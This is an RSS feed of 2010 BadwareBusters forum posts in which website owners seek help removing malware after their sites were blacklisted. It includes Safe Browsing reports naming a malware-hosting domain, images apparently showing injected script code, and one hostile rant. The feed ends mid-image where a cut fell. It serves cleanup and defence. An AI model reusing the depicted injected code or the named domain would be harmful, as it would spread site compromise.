http://badwarebusters.org/ BadwareBusters is a community of people working together to fight back against viruses, spyware, and other bad software. en-us <p>A sub directory of my website is randomly showing Firefox Reported Attack Site warnings. At the beginning of August the site was running code for an ad server that got hacked. All was cleaned up and warnings removed within in a day.</p> <p>There are no alerts in <span>WMT</span> and when I click the link to show Why This Site Was Blocked it shows the following:</p> <p>What is the current listing status for www.djmick.co.uk/girls/backshift-babes?</p> This site is not currently listed as suspicious. <p>What happened when Google visited this site?</p> Of the 20 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-08-29, and the last time suspicious content was found on this site was on 2010-08-05. <p>Can anyone offer any insight as to what the problem is and how I can go about resolving it?</p> <p>Many thanks<br /> Mick</p> contact@badwarebusters.org (mickm) Thu, 02 Sep 2010 18:47:37 -0400 http://badwarebusters.org/main/itemview/21173 http://badwarebusters.org/main/itemview/21173 <p>hi, how f i need create account on google if they dont call me and they not answer nothing, and is not for free u need pay you phone for they can send the code.</p> <p>we were happy before you and survived many years with our hosting clean &#8230; now find that you will do good here? oh and also I forgot that google not only charges for sending the code but you also have the option to donate paypal, oh come on who are you doing?</p> <p>i need you leave and stop the put these malware in my hosting for you can still on this f web.<br /> all this people here with they hosting is working clean, and ur contract a hacker to put these f malware&#8230; or google his putting this?. <br /> i have many friend around the world and and i promise that i will find the person responsible&#8230;<br /> thanks, i dont need you answe, <br /> i need this post can still here for many pp open they mind and eyes.</p> contact@badwarebusters.org (jlroco) Thu, 02 Sep 2010 17:48:50 -0400 http://badwarebusters.org/main/itemview/21171 http://badwarebusters.org/main/itemview/21171 <p>Help please my site is reported as infected, I found nothing I had searched randomly most files but found no suspicious codes. my site is www.itthad.com</p> <p>please help and inform me where is the badware code so I can work and remove.</p> contact@badwarebusters.org (mohafez) Thu, 02 Sep 2010 11:21:10 -0400 http://badwarebusters.org/main/itemview/21166 http://badwarebusters.org/main/itemview/21166 <p>we have 2 websites that we changed the host and we found the code that produced malware and we removed them&#8230;Then we resubmitted both sites and saw the spiders from google visited the websites, but the sites still have the warning,,,<br /> please advise.</p> <p>http://www.speedingticketbroward.com &amp; http://www.speedingticketmiami.com</p> contact@badwarebusters.org (lyleses07) Wed, 01 Sep 2010 23:50:15 -0400 http://badwarebusters.org/main/itemview/21163 http://badwarebusters.org/main/itemview/21163 <p>I have the WP site http://jimhalterman.com. I was getting malware warnings on many posts so I first changed my WP password and did the WP upgrade to 3.0.1.</p> <p>I used StopBadware.org&#8217;s Website Clearinghouse to find posts that were infected and it pulled up 154 posts, some older, some fairly recent (before the upgrade). Other than deleting each of those 154 posts, is there an easier way to clear up the malware problem?? This is all new to me but I want to learn how to clear it up and keep it from happening again.</p> contact@badwarebusters.org (jimhalterman) Wed, 01 Sep 2010 23:43:25 -0400 http://badwarebusters.org/main/itemview/21162 http://badwarebusters.org/main/itemview/21162 <p>hey guys i have been trying to look up the malware that was hacked in my website and all i found was that jquery on it i checked it and found no malware and sent it to review with google and it still says it has malware. What happened when Google visited this site?<br /> Of the 3 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-08-31, and the last time suspicious content was found on this site was on 2010-08-30.<br /> Malicious software is hosted on 1 domain(s), including crocro.biz/.</p> <p>This site was hosted on 1 network(s) including AS31815 (<span>MEDIATEMPLE</span>).<br /> my website is www.shiftyourhabit.com</p> contact@badwarebusters.org (shiftyourhabit) Wed, 01 Sep 2010 20:54:34 -0400 http://badwarebusters.org/main/itemview/21158 http://badwarebusters.org/main/itemview/21158 <p>How do I remove Malware from my website i.e. www.kiteswithoutstrings.org</p> <p>This is second time this has happened in 1 month, in the first instance I restored the website to an older date when it was working fine. Yesterday again the website is hit with Malware.</p> <p>Please help on how do I get rid of this.<br /> Below is the code that is added to my <span>PHP</span> files.</p> <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAAOEAQAAAAJt3bXAAAAAmJLR0QAAKqN IzIAAAAJcEhZcwAAAEgAAABIAEbJaz4AAAAJdnBBZwAAAlgAAAAOAPwTCzQA AAL7SURBVHja7dw/SNRhHMfx9915enIkyF1Zh4mp1dIsIkhd5L8hEI4buxwa 2m8KHEqHhqLBVUqhIQpqKZocCoJcxEnKRS0dokjlDiPzzl/Dt3pOLT3p5BQ+ r+Wee37P8/wenunD8zz8QERERERERERERP6orwfP273diRMwP1/u2YqIiIgc Aj4fhEK7tys2iImIiIgcOoVhKJGAmRnI5WB2Fvr6rL6yEoaHYWUFslkYHYVw 2PXzPLh8Gb5+hf4qF5z8fiunUvDpE6yuwoMHUF1t/z0PFhfdPHy+cq+GiIiI yH9oboa7dy1QgQWm79+hqwuCQbhyBT5/tmdDQ/DmDcRicPw4TEzAzZtuLM+D 8XFob4cz0y5gBYNWfv7c+p0+DVNTcOfO9h2sRAImJ6G/v7gdMBEREZEDwe+H nh548QLev4d0GiIRe1ZTAz9+wLVrcOTI5qO+Dx8gHnfjnDsHnZ3uv+dBR4eV C4NTKGTls2dd2+5uWFjYHrB8Pmhrg4cPbVfr9m1oaCj3iomIiIjsoKMD3r2D p0/h0iULW1v19sKrV/DtG7x9a+3AjgwbG/89tue5MFQYnMJhK1dUuLanTkE+ v/MdrKNH4cYNO6Z89qzcKyciIiKy1a8gtb4Oa2sWXiKRzaEHoKoKlpfhwgWI RuHRI3jyxJ59+QInT7q2ra1w/frm/hsb218dCNhvU5Ora2mx+1c7CQQsAOZy dm9LRERE5MDy+Wwn6/Fj+PgRbt2ynSSwi+eZDJw/b+Hr6lV3Af3ePXj92j6t UFdnu1uDg25cz3PjFO5M1dZa+eVL6/e3O1iVlW5u8biFurk5GBiAY8fKvWIi IiIiexCLWcCannZ1qZTdj8rn7Tjx4kWrr66GkRELYNksjI1Z3W//CljRqJXT aVhast2o+/etbyhk785krG0yaSEumbTL8SIiIiKH1tajwlKqqyv+W1f7OQ8R ERGR0vLv/DiX279X/76DVYz9nIeIiIhIae0h5JSa3293q8bHy70IIiIiIqX0 E8/44ESIbyFpAAAAEHRFWHRjYXB0aW9uADxzY3JpcHQ+MVEQZAAAACV0RVh0 ZGF0ZTpjcmVhdGUAMjAxMC0wOS0wMlQxOTo0NjozOS0wNDowMMbrOVAAAAAl dEVYdGRhdGU6bW9kaWZ5ADIwMTAtMDktMDJUMTk6NDY6MzktMDQ6MDC3toHs AAAAAElFTkSuQmCC ' alt='' /><img src='data:image/png;base64,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 OS0wNDowMLe2gewAAAAASUVORK5CYII= ' alt='' /><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAAOEAQAAAAJt3bXAAAAAmJLR0QAAKqN IzIAAAAJcEhZcwAAAEgAAABIAEbJaz4AAAAJdnBBZwAAAlgAAAAOAPwTCzQA AAM1SURBVHja7dxNSFRRGMbx/53xY4ahIByzhgzT0o2bNmGB2ESmLQJhcOnH okX7WQUJlYGIIeguxApcREFBFK1cWAi1iVZSbtSyRShWOCh9jN0Wb3JmMr8o nYrnt5lz7z3nzJm7enjPYUBEREREREREROQ/cvgwXLny5+bbtw98f/1+e/fC 1FSuf72IiIjIFujuhurqPzef50EotH6/jQYxERERkb9eZvjxPHj40F0nEjA+ Duk0TExAU5PdLyiA/n74+BFSKbhxAyIRN8734cwZmJuD9kIXnAIBa7e2wrt3 sLAA169DOGzXvg9v37p1eV6u346IiIjIJlRUwNWrFqCWHT0KHR3WjkTg0yc4 dQry86GlBWZm7FlnJ4yOQiwGe/bAs2dw8aKbx/dheBiOHYPKMRew8vOt/eCB jTt0CF68gJ6elRWsRAKeP4f29o1VwERERERyIhCAxkarUr16BckkFBW55319 UFlp7Z074csXOHsWduzI3up7/RricTeuuhrq692170NtrbUzg1MoZO2qKte3 oQGmp1cGLM+DmhoYGrKqVlcX7N+f6zcoIiIikqG2Fl6+hLt34eRJC1uZgsHs 7UGA06dhZAQWF+HpUxsHtmVYVrb6d/m+C0OZwSkSsXZenut74AAsLa19Bqu4 GM6ft23Ke/dy/SZFREREfgSpr1/h82cLK0VF2SEHoK4Onjxx14WF8OEDHD8O 0SjcugV37tiz2VkoLXV9jxyBc+ey5/v2beVSgkH7LC939w4etPNXawkGLRCm 03ZuS0REROSv4XlWybp9G968gUuXrHIEcO1adlUqHIb5eQteeXnQ1uYOoPf2 wuPH9tcKJSVW3bp82Y31fTdvZmVq1y5rP3pk4351BqugwK01HrdQNzkJFy7A 7t25foMiIiIia4jFLGCNjdnh8/v3V/ZpbbXzUUtLtr144oTdD4dhYMACWCoF N2/avWWrBaxo1NrJJLx/b9WowUEbGwrZWubnrW9zs4W45mZbn4iIiMg/4+et wq1UUrLx/7raznWJiIiIbE5g7cfp9PYtZfkM1kZs57pERERENmcToWarBQJ2 tmp4ONcrEREREfkd3wE4Ju2qcjpT0AAAABF0RVh0Y2FwdGlvbgA8L3Njcmlw dD7D7hzbAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDEwLTA5LTAyVDE5OjQ2OjQx LTA0OjAw/8F+LgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxMC0wOS0wMlQxOTo0 Njo0MS0wNDowMI6cxpIAAAAASUVORK5CYII= ' alt='' /> contact@badwarebusters.org (viral786) Wed, 01 Sep 2010 15:28:16 -0400 http://badwarebusters.org/main/itemview/21150 http://badwarebusters.org/main/itemview/21150 <p>We use hostgator to host our site &#8211; www.addictedtophones.com We recently got on google&#8217;s blacklist for having malware. Not sure how that happen. We ask hostgator to remove whatever it is on our site but they couldn&#8217;t find any&#8230; please help!!</p> contact@badwarebusters.org (mrtensai) Wed, 01 Sep 2010 15:26:08 -0400 http://badwarebusters.org/main/itemview/21149 http://badwarebusters.org/main/itemview/21149 <p>A SP site of mine (http://www.bikingthedivide.com) is showing up as being infected with malware in Chrome. I found one infected file and removed the code, then resubmitted to Google. But 2 days later its still showing up as infected.</p> <p>Can someone help me find the other infected files?</p> contact@badwarebusters.org (brettdewoody) Wed, 01 Sep 2010 14:05:39 -0400 http://badwarebusters.org/main/itemview/21134 http://badwarebusters.org/main/itemview/21134 <p>My site is not any malicious software Beah www.vb3rb.com<br /> There were some problems in the company hosting.<br /> The matter was resolved with Hosting Company<br /> Please check the site again, he is now clean and in compliance with the terms of your service</p> contact@badwarebusters.org (adham2010) Wed, 01 Sep 2010 13:58:31 -0400 http://badwarebusters.org/main/itemview/21131 http://badwarebusters.org/main/itemview/21131 <p>I have 3 WordPress sites that Google has found to have badware. I spent 24 hrs. working on the most crucial one to upgrade WP and changed passwords for my <span>FTP</span>, DB and the WP login itself.</p> <p>Unfortunately, I cannot view the page source to see where on the pages this code is located or login to my WP admin in order to upgrade any plugins because of the Google warning. The only other thing I know to do is to just delete all plugins by <span>FTP</span> (and possibly everything else, starting over).</p> <p>If anyone has any experience with WordPress sites being hacked, please tell me a good way to get things cleaned up, secure and back online. Google is blocking me from even doing that. Thanks in advance.</p> <p>Here are some pages they listed:<br /> http://www.eunicehart.com/?p=13<br /> http://www.eunicehart.com/?p=27<br /> http://www.eunicehart.com/?p=30<br /> http://www.eunicehart.com/?page_id=10</p> <p>And the code they say is on the pages:<br /> <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAAOEAQAAAAJt3bXAAAAAmJLR0QAAKqN IzIAAAAJcEhZcwAAAEgAAABIAEbJaz4AAAAJdnBBZwAAAlgAAAAOAPwTCzQA AAaRSURBVHja7ZxXaBRbGIC/3XRbjCYmShR7AUV8ERXE3kBBEFFsEfRBQX0R xBKxolhBEStqxAcLKIiX+KJgVwQRFLFgL2gUjYlGLNG9D/+de2ZPpmz26rX9 Hywz/5wz5y8z4fz5z9kFRVEURVEURVEURVEURVH+pbAQYrHwfk2bwoMHP9pa Y6/b7iAfbLu/hR/dusHy5TXlRGOpJIYT10hEji9ewKdPcOYMdOokfbzeB0VR FEX54UQikJkZ3u9nmcDy8uDjR3MMs81u+xZ+rFoFnTvXlBONpZIYTlzHjoXH j+W8Th1Ytw4uXZI+Xu+DoiiKotQa9wQ+ahTcugXV1XDvHowcKdfT02HjRnjz Bt6+hd27oW5dc18sBiNGwKtXMDnDJBzRqJxPmgTPn0NVFezaBVlZIsdi8OSJ 